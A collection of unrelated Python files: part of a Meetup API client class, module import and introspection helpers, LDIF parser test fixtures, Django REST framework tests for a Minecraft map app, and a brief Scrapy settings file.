birthday_string = ''
b_day = profile_details['birthday']
if b_day['day'] and b_day['month']:
if b_day['month'] < 10:
birthday_string += '0'
birthday_string += str(b_day['month'])
if b_day['day'] < 10:
birthday_string += '0'
birthday_string += str(b_day['day'])
birthday_string += str(b_day['year'])
params['birthday'] = birthday_string
# send requests
profile_details = self._patch_request(url, params=params)
return profile_details
def list_member_topics(self, member_id):
''' a method to retrieve a list of topics member follows
:param member_id: integer with meetup member id
:return: dictionary with list of topic details inside [json] key
topic_details = self.objects.topic.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.list_member_topics' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct member id
if not member_id:
raise IndexError('%s requires member id argument.' % title)
# compose request fields
url = '%s/members/%s' % (self.endpoint, str(member_id))
params = {
'fields': 'topics'
}
# send requests
response_details = self._get_request(url, params=params)
# construct method output dictionary
member_topics = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_topics[key] = value
# parse response
if response_details['json']:
if 'topics' in response_details['json'].keys():
for topic in response_details['json']['topics']:
member_topics['json'].append(self.objects.topic.ingest(**topic))
return member_topics
def list_member_groups(self, member_id):
''' a method to retrieve a list of meetup groups member belongs to
:param member_id: integer with meetup member id
:return: dictionary with list of group details in [json]
group_details = self.objects.group_profile.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#get
title = '%s.list_member_groups' % self.__class__.__name__
# validate inputs
input_fields = {
'member_id': member_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct member id
if not member_id:
raise IndexError('%s requires member id argument.' % title)
# compose request fields
url = '%s/members/%s' % (self.endpoint, str(member_id))
params = {
'fields': 'memberships'
}
# send requests
response_details = self._get_request(url, params=params)
# construct method output dictionary
member_groups = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_groups[key] = value
# parse response
if response_details['json']:
if 'memberships' in response_details['json'].keys():
for group in response_details['json']['memberships']['member']:
member_groups['json'].append(self.objects.group_profile.ingest(**group))
return member_groups
def list_member_events(self, upcoming=True):
''' a method to retrieve a list of events member attended or will attend
:param upcoming: [optional] boolean to filter list to only future events
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/self/events/
# construct request fields
url = '%s/self/events' % self.endpoint
params = {
'status': 'past',
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable'
}
if upcoming:
params['status'] = 'upcoming'
# send requests
response_details = self._get_request(url, params=params)
# construct method output
member_events = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
member_events[key] = value
for event in response_details['json']:
member_events['json'].append(self._reconstruct_event(event))
return member_events
def get_member_calendar(self, max_results=0):
''' a method to retrieve the upcoming events for all groups member belongs to
:param max_results: [optional] integer with number of events to include
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/self/calendar/#list
title = '%s.get_member_calendar' % self.__class__.__name__
# validate inputs
input_fields = {
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/self/calendar' % self.endpoint
params = {
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable'
}
if max_results:
params['page'] = str(max_results)
# send requests
response_details = self._get_request(url, params=params)
# construct method output
member_calendar = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
member_calendar[key] = value
for event in response_details['json']:
member_calendar['json'].append(self._reconstruct_event(event))
return member_calendar
def list_groups(self, topics=None, categories=None, text='', country_code='', latitude=0.0, longitude=0.0, location='', radius=0.0, zip_code='', max_results=0, member_groups=True):
''' a method to find meetup groups based upon a number of filters
:param topics: [optional] list of integer meetup ids for topics
:param text: [optional] string with words in groups to search
:param country_code: [optional] string with two character country code
:param latitude: [optional] float with latitude coordinate at center of geo search
:param longitude: [optional] float with longitude coordinate at center of geo search
:param location: [optional] string with meetup location name fields to search
:param radius: [optional] float with distance from center of geographic search
:param zip_code: [optional] string with zip code of geographic search
:param max_results: [optional] integer with number of groups to include
:param member_groups: [optional] boolean to include groups member belongs to
:return: dictionary with list of group details inside [json] key
group_details = self._reconstruct_group(**{})
'''
# https://www.meetup.com/meetup_api/docs/find/groups/
title = '%s.list_groups' % self.__class__.__name__
# validate inputs
input_fields = {
'categories': categories,
'topics': topics,
'text': text,
'country_code': country_code,
'latitude': latitude,
'longitude': longitude,
'location': location,
'radius': radius,
'zip_code': zip_code,
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/find/groups' % self.endpoint
params = {
'fields': 'last_event,next_event,join_info',
'self_groups': 'include'
}
if not member_groups:
params['self_groups'] = 'exclude'
if max_results:
params['page'] = str(max_results)
if categories:
params['category'] = ','.join(str(item) for item in categories)
if topics:
params['topic_id'] = ','.join(str(item) for item in categories)
if text:
params['text'] = text
if country_code:
params['country'] = country_code.lower()
if latitude:
params['lat'] = str(latitude)
if longitude:
params['lon'] = str(longitude)
if location:
params['location'] = location
if radius:
params['radius'] = str(radius)
if zip_code:
params['zip'] = zip_code
# send request
response_details = self._get_request(url, params=params)
# construct method output
meetup_groups = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
meetup_groups[key] = value
for group in response_details['json']:
meetup_groups['json'].append(self._reconstruct_group(group))
return meetup_groups
def get_group_details(self, group_url='', group_id=0):
''' a method to retrieve details about a meetup group
:param group_url: string with meetup urlname of group
:param group_id: int with meetup id for group
:return: dictionary with group details inside [json] key
group_details = self._reconstruct_group(**{})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/#get
title = '%s.get_group_details' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'group_id': group_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
if not group_url and not group_id:
raise IndexError('%s requires either a group_url or group_id argument.' % title)
# construct request fields
if group_id:
url = '%s/2/groups?fields=last_event,next_event,join_info&group_id=%s' % (self.endpoint, group_id)
else:
url = '%s/%s?fields=last_event,next_event,join_info' % (self.endpoint, group_url)
# send request
group_details = self._get_request(url)
# cosntruct method output
if group_id:
if 'results' in group_details['json'].keys():
if group_details['json']['results']:
group_details['json'] = self._reconstruct_group(group_details['json']['results'][0])
else:
group_details['json'] = self._reconstruct_group(group_details['json'])
return group_details
def list_group_events(self, group_url, upcoming=True):
''' a method to retrieve a list of upcoming events hosted by group
:param group_url: string with meetup urlname field of group
:param upcoming: [optional] boolean to filter list to only future events
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/#list
title = '%s.list_group_events' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events' % (self.endpoint, group_url)
params = {
'status': 'past',
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable'
}
if upcoming:
params['status'] = 'upcoming'
# send request
response_details = self._get_request(url, params=params)
# construct method output
group_events = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
group_events[key] = value
for event in response_details['json']:
group_events['json'].append(self._reconstruct_event(event))
return group_events
def list_group_members(self, group_url, max_results=0):
''' a method to retrieve a list of members for a meetup group
:param group_url: string with meetup urlname for group
:param max_results: [optional] integer with number of members to include
:return: dictionary with list of member details inside [json] key
member_details = self._reconstruct_member({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/members/#list
title = '%s.list_group_members' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/members' % (self.endpoint, group_url)
params = {
'fields': 'gender,birthday,last_event,messaging_pref,next_event,other_services,privacy,self,stats'
}
if max_results:
params['page'] = str(max_results)
# send request
response_details = self._get_request(url, params=params)
# reconstruct method output
group_members = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
group_members[key] = value
for member in response_details['json']:
group_members['json'].append(self._reconstruct_member(member))
return group_members
def get_event_details(self, group_url, event_id):
''' a method to retrieve details for an event
:param group_url: string with meetup urlname for host group
:param event_id: integer with meetup id for event
:return: dictionary with list of event details inside [json] key
event_details = self._reconstruct_event({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:id/#get
title = '%s.get_event_details' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s' % (self.endpoint, group_url, str(event_id))
params = {
'fields': 'comment_count,event_hosts,rsvp_rules,short_link,survey_questions,rsvpable,rsvpable_after_join'
}
# send request
event_details = self._get_request(url, params=params)
# construct method output
if event_details['json']:
event_details['json'] = self._reconstruct_event(event_details['json'])
return event_details
def list_event_attendees(self, group_url, event_id):
''' a method to retrieve attendee list for event from meetup api
:param group_url: string with meetup urlname for host group
:param event_id: integer with meetup id for event
:return: dictionary with list of attendee details inside [json] key
attendee_details = self._reconstruct_attendee({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:event_id/rsvps/#list
title = '%s.list_event_attendees' % self.__class__.__name__
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s/rsvps' % (self.endpoint, group_url, str(event_id))
# send request
response_details = self._get_request(url)
# construct method output
event_attendees = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
event_attendees[key] = value
for attendee in response_details['json']:
event_attendees['json'].append(self._reconstruct_attendee(attendee))
return event_attendees
def get_venue_details(self, venue_id):
''' a method to retrieve venue details from meetup api
:param venue_id: integer for meetup id for venue
:return: dictionary with venue details inside [json] key
venue_details = self.objects.venue.schema
'''
title = '%s.get_venue_details' % self.__class__.__name__
# validate inputs
input_fields = {
'venue_id': venue_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/2/venues' % self.endpoint
params = {
'venue_id': str(venue_id)
}
# send request
venue_details = self._get_request(url, params=params)
# reconstruct method output
if venue_details['json']:
if 'results' in venue_details['json'].keys():
if venue_details['json']['results']:
details = venue_details['json']['results'][0]
venue_details['json'] = self.objects.venue.ingest(**details)
return venue_details
def list_locations(self, latitude=0.0, longitude=0.0, zip_code='', city_name='', max_results=0):
''' a method to retrieve location address details based upon search parameters
:param latitude: [optional] float with latitude coordinate at center of geo search
:param longitude: [optional] float with longitude coordinate at center of geo search
:param city_name: [optional] string with name of city for search
:param zip_code: [optional] string with zip code of geographic search
:param max_results: [optional] integer with number of groups to include
:return: dictionary with list of location details inside [json] key
location_details = self.objects.location.schema
'''
# https://www.meetup.com/meetup_api/docs/find/locations/
title = '%s.list_locations' % self.__class__.__name__
# validate inputs
input_fields = {
'latitude': latitude,
'longitude': longitude,
'zip_code': zip_code,
'city_name': city_name,
'max_results': max_results
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# validate requirements
if latitude or longitude:
if not latitude or not longitude:
raise IndexError('%s coordinate search requires both latitude and longitude arguments.' % title)
# construct request fields
url = '%s/find/locations' % self.endpoint
params = {}
if max_results:
params['page'] = str(max_results)
if latitude:
params['lat'] = str(latitude)
if longitude:
params['lon'] = str(longitude)
elif zip_code:
params['query'] = zip_code
elif city_name:
params['query'] = city_name
# send request
response_details = self._get_request(url, params=params)
# construct method output
meetup_locations = {
'json': []
}
for key, value in response_details.items():
if key != 'json':
meetup_locations[key] = value
for location in response_details['json']:
meetup_locations['json'].append(location)
return meetup_locations
def join_group(self, group_url, membership_answers=None):
''' a method to add member to a meetup group
:param group_url: string with meetup urlname for group
:param membership_answers: list with question id and answer for group join questions
:return: dictionary with member profile details inside [json] key
profile_details = self._reconstruct_member({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/members/#create
title = '%s.join_group' % self.__class__.__name__
# validate permissions
if not 'group_join' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'membership_answers': membership_answers
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/members' % (self.endpoint, group_url)
params = {}
if membership_answers:
for answer in membership_answers:
key = 'answer_%s' % str(answer['question_id'])
params[key] = answer['answer_text']
# send request
response_details = self._post_request(url, params=params)
# construct method output
if response_details['json']:
response_details['json'] = self._reconstruct_member(response_details['json'])
return response_details
def leave_group(self, group_url, member_id, exit_comment=''):
''' a method to remove group from meetup member profile
:param group_url: string with meetup urlname for group
:param member_id: integer with member id from member profile
:param exit_comment: string with comment to leave with organizer
:return: dictionary with code 204 on success
'''
# https://www.meetup.com/meetup_api/docs/:urlname/members/:member_id/#delete
title = '%s.leave_group' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
raise ValueError('%s requires profile_edit as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'member_id': member_id,
'exit_comment': exit_comment
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/members/%s' % (self.endpoint, group_url, str(member_id))
params = {}
if exit_comment:
params['exit_comment'] = exit_comment
# send request
response_details = self._delete_request(url, params=params)
return response_details
def join_topics(self, member_id, topics):
''' a method to add topics to member profile details on meetup
:param member_id: integer with member id from member profile
:param topics: list of integer meetup ids for topics
:return: dictionary with list of topic details inside [json] key
topic_details = self.objects.topic.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#edit
title = '%s.join_topics' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'member_id': member_id,
'topics': topics
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/members/%s' % (self.endpoint, member_id)
params = {
'add_topics': ','.join(str(x) for x in topics),
'fields': 'topics'
}
# send requests
response_details = self._patch_request(url, params=params)
# construct method output dictionary
member_topics = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_topics[key] = value
# parse response
if response_details['json']:
if 'topics' in response_details['json'].keys():
for topic in response_details['json']['topics']:
member_topics['json'].append(self.objects.topic.ingest(**topic))
return member_topics
def leave_topics(self, member_id, topics):
''' a method to remove topics from member profile details on meetup
:param member_id: integer with member id from member profile
:param topics: list of integer meetup ids for topics
:return: dictionary with list of topic details inside [json] key
topic_details = self.objects.topic.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#edit
title = '%s.leave_topics' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'member_id': member_id,
'topics': topics
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/members/%s' % (self.endpoint, member_id)
params = {
'remove_topics': ','.join(str(x) for x in topics),
'fields': 'topics'
}
# send requests
response_details = self._patch_request(url, params=params)
# construct method output dictionary
member_topics = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_topics[key] = value
# construct method output
if response_details['json']:
if 'topics' in response_details['json'].keys():
for topic in response_details['json']['topics']:
member_topics['json'].append(self.objects.topic.ingest(**topic))
return member_topics
def join_event(self, group_url, event_id, additional_guests=0, attendance_answers=None, payment_service='', payment_code=''):
''' a method to create an rsvp for a meetup event
:param group_url: string with meetup urlname for group
:param event_id: integer with meetup id for event
:param additional_guests: [optional] integer with number of additional guests
:param attendance_answers: [optional] list with id & answer for event survey questions
:param payment_service: [optional] string with name of payment service to use
:param payment_code: [optional] string with token to authorize payment
:return: dictionary with attendee details inside [json] key
attendee_details = self._reconstruct_attendee({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:event_id/rsvps/
title = '%s.join_event' % self.__class__.__name__
# validate permissions
if not 'rsvp' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id,
'additional_guests': additional_guests,
'attendance_answers': attendance_answers,
'payment_service': payment_service,
'payment_code': payment_code
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s/rsvps' % (self.endpoint, group_url, event_id)
params = {
'response': 'yes'
}
if additional_guests:
params['guests'] = additional_guests
if attendance_answers:
for answer in attendance_answers:
key = 'answer_%s' % str(answer['question_id'])
params[key] = answer['answer_text']
if payment_service:
params['agree_to_refund'] = True
params['opt_to_pay'] = True
# send request
response_details = self._post_request(url, params=params)
# construct method output
if response_details['json']:
response_details['json'] = self._reconstruct_attendee(response_details['json'])
return response_details
def leave_event(self, group_url, event_id):
''' a method to rescind an rsvp to a meetup event
:param group_url: string with meetup urlname for group
:param event_id: integer with meetup id for event
:return: dictionary with attendee details inside [json] key
attendee_details = self._reconstruct_attendee({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:event_id/rsvps/
title = '%s.leave_event' % self.__class__.__name__
# validate permissions
if not 'rsvp' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s/rsvps' % (self.endpoint, group_url, event_id)
params = {
'response': 'no'
}
# send request
response_details = self._post_request(url, params=params)
# construct method output
if response_details['json']:
response_details['json'] = self._reconstruct_attendee(response_details['json'])
return response_details
|
"""
module: tools for python modules
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
ToDo:
Add functions for getting and naming module-level variables.
"""
from __future__ import annotations
import importlib
from importlib import util
import inspect
import pathlib
import sys
import types
from typing import Any, Optional, Type, Union
import denovo
""" Introspection Tools """
def get_classes(module: types.ModuleType,
include_private: bool = False) -> list[Type[Any]]:
"""Returns list of classes in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
list[Type[Any]]: list of classes in 'module'.
"""
classes = [m[1] for m in inspect.getmembers(module, inspect.isclass)
if m[1].__module__ == module.__name__]
if not include_private:
classes = denovo.modify.drop_privates(item = classes)
return classes
def get_functions(module: types.ModuleType,
include_private: bool = False) -> list[types.FunctionType]:
"""Returns list of functions in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
list[Type[types.FunctionType]]: list of functions in 'module'.
"""
functions = [m[1] for m in inspect.getmembers(module, inspect.isfunction)
if m[1].__module__ == module.__name__]
if not include_private:
functions = denovo.modify.drop_privates(item = functions)
return functions
def name_classes(module: types.ModuleType,
include_private: bool = False) -> list[str]:
"""Returns list of string names of classes in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
list[Type[types.FunctionType]]: list of functions in 'module'.
"""
classes = [m[0] for m in inspect.getmembers(module, inspect.isclass)
if m[1].__module__ == module.__name__]
if not include_private:
classes = denovo.modify.drop_privates(item = classes)
return classes
def name_functions(module: types.ModuleType,
include_private: bool = False) -> list[str]:
"""Returns list of string names of functions in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
list[Type[types.FunctionType]]: list of functions in 'module'.
"""
functions = [m[0] for m in inspect.getmembers(module, inspect.isfunction)
if m[1].__module__ == module.__name__]
if not include_private:
functions = denovo.modify.drop_privates(item = functions)
return functions
""" Conversion Tools """
def from_file_path(path: Union[pathlib.Path, str],
name: Optional[str] = None) -> types.ModuleType:
"""Imports and returns module from file path at 'name'.
Args:
path (Union[pathlib.Path, str]): file path of module to load.
name (Optional[str]): name to store module at in 'sys.modules'. If it
is None, the stem of 'path' is used. Defaults to None.
Returns:
types.ModuleType: imported module.
"""
if isinstance(path, str):
path = pathlib.Path(path)
if name is None:
name = path.stem
spec = util.spec_from_file_location(name, path)
if spec is None:
raise ImportError(f'Failed to create spec from {path}')
else:
return util.module_from_spec(spec)
def from_import_path(path: str, name: Optional[str] = None) -> types.ModuleType:
"""Imports and returns module from import path at 'name'.
Args:
path (Union[pathlib.Path, str]): import path of module to load.
name (Optional[str]): name to store module at in 'sys.modules'. If it
is None, the stem of 'path' is used. Defaults to None.
Returns:
types.ModuleType: imported module.
"""
if '.' in path:
parts = path.split('.')
module = parts.pop(-1)
package = '.'.join(parts)
try:
imported = importlib.import_module(module, package = package)
except (AttributeError, ImportError, ModuleNotFoundError):
try:
imported = importlib.import_module('.' + module,
package = package)
except (AttributeError, ImportError, ModuleNotFoundError):
imported = importlib.import_module(path)
else:
imported = importlib.import_module(path)
if name is not None:
sys.modules[name] = imported
return imported
def from_path(path: Union[str, pathlib.Path],
name: Optional[str] = None) -> types.ModuleType:
"""Imports and returns module from import or file path at 'name'.
Args:
path (Union[pathlib.Path, str]): import or file path of module to load.
name (Optional[str]): name to store module at in 'sys.modules'. If it
is None, the stem of 'path' is used. Defaults to None.
Returns:
types.ModuleType: imported module.
"""
if isinstance(path, pathlib.Path) or '\\' in path or '\/' in path:
operation = from_file_path
else:
operation = from_import_path # type: ignore
return operation(path = path, name = name)
""" Private Methods """
# def _safe_import(path: str) -> types.ModuleType:
# print('test path safe', path)
# if path in sys.modules:
# return sys.modules[path]
# else:
# try:
# return importlib.import_module(path)
# except AttributeError:
# print('test att error')
# if '.' in path:
# parts = path.split('.')
# item = parts[-1]
# del parts[-1]
# new_path = '.' + '.'.join(parts)
# module = importlib.import_module(new_path)
# return getattr(module, item)
# else:
# raise ImportError(f'{path} could not be imported')
# def _parse_import_path(path: str) -> tuple[Optional[str], Optional[str], str]:
# package = = None
# if '.' in path:
# parts = path.split('.')
# if len(parts) == 1:
# module = parts.pop(-1)
# package = parts[0]
# # If there are only two parts, it is impossible at this stage to know
# # if the two parts are package/module or module/item. So, any call to
# # this function should not assume that it is module/item as the returned
# # data might indicate.
# elif len(parts) > 1:
# module = parts.pop(-1)
# package = '.'.join(parts)
# else:
# module = path
# return package, module
|
BYTES = b"""version: 1
dn: cn=Alice Alison,
mail=alicealison@example.com
objectclass: top
objectclass: person
objectclass: organizationalPerson
cn: Alison Alison
mail: alicealison@example.com
modifytimestamp: 4a463e9a
# another person
dn: mail=foobar@example.org
objectclass: top
objectclass: person
mail: foobar@example.org
modifytimestamp: 4a463e9a
"""
BYTES_SPACE = b"\n\n".join([block + b"\n" for block in BYTES.split(b"\n\n")])
BYTES_OUT = b"""dn: cn=Alice Alison,mail=alicealison@example.com
cn: Alison Alison
mail: alicealison@example.com
modifytimestamp: 4a463e9a
objectclass: top
objectclass: person
objectclass: organizationalPerson
dn: mail=foobar@example.org
mail: foobar@example.org
modifytimestamp: 4a463e9a
objectclass: top
objectclass: person
"""
BYTES_EMPTY_ATTR_VALUE = b"""dn: uid=foo123,dc=ws1,dc=webhosting,o=eim
uid: foo123
domainname: foo.bar
homeDirectory: /foo/bar.local
aliases:
aliases: foo.bar
"""
LINES = [
b"version: 1",
b"dn: cn=Alice Alison,mail=alicealison@example.com",
b"objectclass: top",
b"objectclass: person",
b"objectclass: organizationalPerson",
b"cn: Alison Alison",
b"mail: alicealison@example.com",
b"modifytimestamp: 4a463e9a",
b"",
b"dn: mail=foobar@example.org",
b"objectclass: top",
b"objectclass: person",
b"mail: foobar@example.org",
b"modifytimestamp: 4a463e9a",
]
BLOCKS = [
[
b"version: 1",
b"dn: cn=Alice Alison,mail=alicealison@example.com",
b"objectclass: top",
b"objectclass: person",
b"objectclass: organizationalPerson",
b"cn: Alison Alison",
b"mail: alicealison@example.com",
b"modifytimestamp: 4a463e9a",
],
[
b"dn: mail=foobar@example.org",
b"objectclass: top",
b"objectclass: person",
b"mail: foobar@example.org",
b"modifytimestamp: 4a463e9a",
],
]
DNS = ["cn=Alice Alison,mail=alicealison@example.com", "mail=foobar@example.org"]
CHANGETYPES = [None, None]
RECORDS = [
{
"cn": ["Alison Alison"],
"mail": ["alicealison@example.com"],
"modifytimestamp": ["4a463e9a"],
"objectclass": ["top", "person", "organizationalPerson"],
},
{
"mail": ["foobar@example.org"],
"modifytimestamp": ["4a463e9a"],
"objectclass": ["top", "person"],
},
]
URL = b"https://tools.ietf.org/rfc/rfc2849.txt"
URL_CONTENT = "The LDAP Data Interchange Format (LDIF)"
|
from django.contrib.auth import get_user_model
from minemaphelper.minemap.models import World, MinecraftMap
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase, URLPatternsTestCase
class WorldTests(APITestCase):
def setUp(self):
self.user = get_user_model()(username='staff')
self.user.set_password('staffword')
self.user.save()
def test_list_worlds(self):
url = reverse('world-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 0)
def test_create_world_forbidden_when_anonymous(self):
url = reverse('world-list')
data = {'name': 'World', 'private': True}
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_world_when_authenticated(self):
url = reverse('world-list')
data = {'name': 'World', 'private': True}
self.assertTrue(self.client.login(username='staff', password='staffword'))
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEquals(response.data, { 'pk': 1, 'name': 'World', 'private': True})
def test_access_private_world_when_anonymous(self):
self.test_create_world_when_authenticated()
self.client.logout()
url = reverse('world-detail', kwargs={'pk': 1})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class MapListTests(APITestCase):
def setUp(self):
self.private_world = World.objects.create(name='Test world', private=True)
self.public_world = World.objects.create(name='Public test world', private=False)
self.test_user = get_user_model().objects.create(username='testuser')
self.test_user.set_password('testpassword')
self.test_user.save(update_fields=['password'])
self.test_user2 = get_user_model().objects.create(username='testuser2')
self.private_world.users.add(self.test_user)
self.public_world.users.add(self.test_user)
def tearDown(self):
self.private_world.delete()
self.public_world.delete()
self.test_user.delete()
self.test_user2.delete()
def test_list_maps_unauthenticated_for_private_world_fails(self):
url = reverse('map-list', args=[self.private_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_list_maps_unauthenticated_for_public_world_succeeds(self):
url = reverse('map-list', args=[self.public_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_list_maps_authenticated_for_private_world_succeeds(self):
self.assertTrue(self.client.login(username='testuser', password='testpassword'))
url = reverse('map-list', args=[self.public_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_list_maps_authenticated_for_public_world_succeeds(self):
self.assertTrue(self.client.login(username='testuser', password='testpassword'))
url = reverse('map-list', args=[self.public_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_list_maps_authenticated_for_invalid_private_world_fails(self):
self.client.force_authenticate(self.test_user2)
url = reverse('map-list', args=[self.private_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class MapDetailTests(APITestCase):
def setUp(self):
self.private_world = World.objects.create(name='Test world', private=True)
self.public_world = World.objects.create(name='Public test world', private=False)
self.good_user = get_user_model().objects.create(username='testuser')
self.bad_user = get_user_model().objects.create(username='testuser2')
self.private_world.users.add(self.good_user)
self.public_world.users.add(self.good_user)
self.map_priv_0_0_0 = MinecraftMap.objects.create(
world=self.private_world,
zoom=0, x=0, z=0,
map=1
)
def tearDown(self):
self.private_world.delete()
self.public_world.delete()
self.good_user.delete()
self.bad_user.delete()
def test_detailed_map_non_existant_fails(self):
url = reverse('map-detail', args=[
self.private_world.pk,
self.map_priv_0_0_0.zoom,
self.map_priv_0_0_0.z,
self.map_priv_0_0_0.x,
])
print(url)
class MarkerTests(APITestCase):
pass
|
# -*- coding: utf-8 -*-
# Config Django web project
# import os
# import sys
# BASE_DIR = os.path.dirname(__file__)
# WEB_DIR = os.path.join(BASE_DIR, 'web')
# sys.path.append(WEB_DIR)
# os.environ['DJANGO_SETTINGS_MODULE'] = 'web.settings'
# Config Scrapy
BOT_NAME = 'pyjobs'
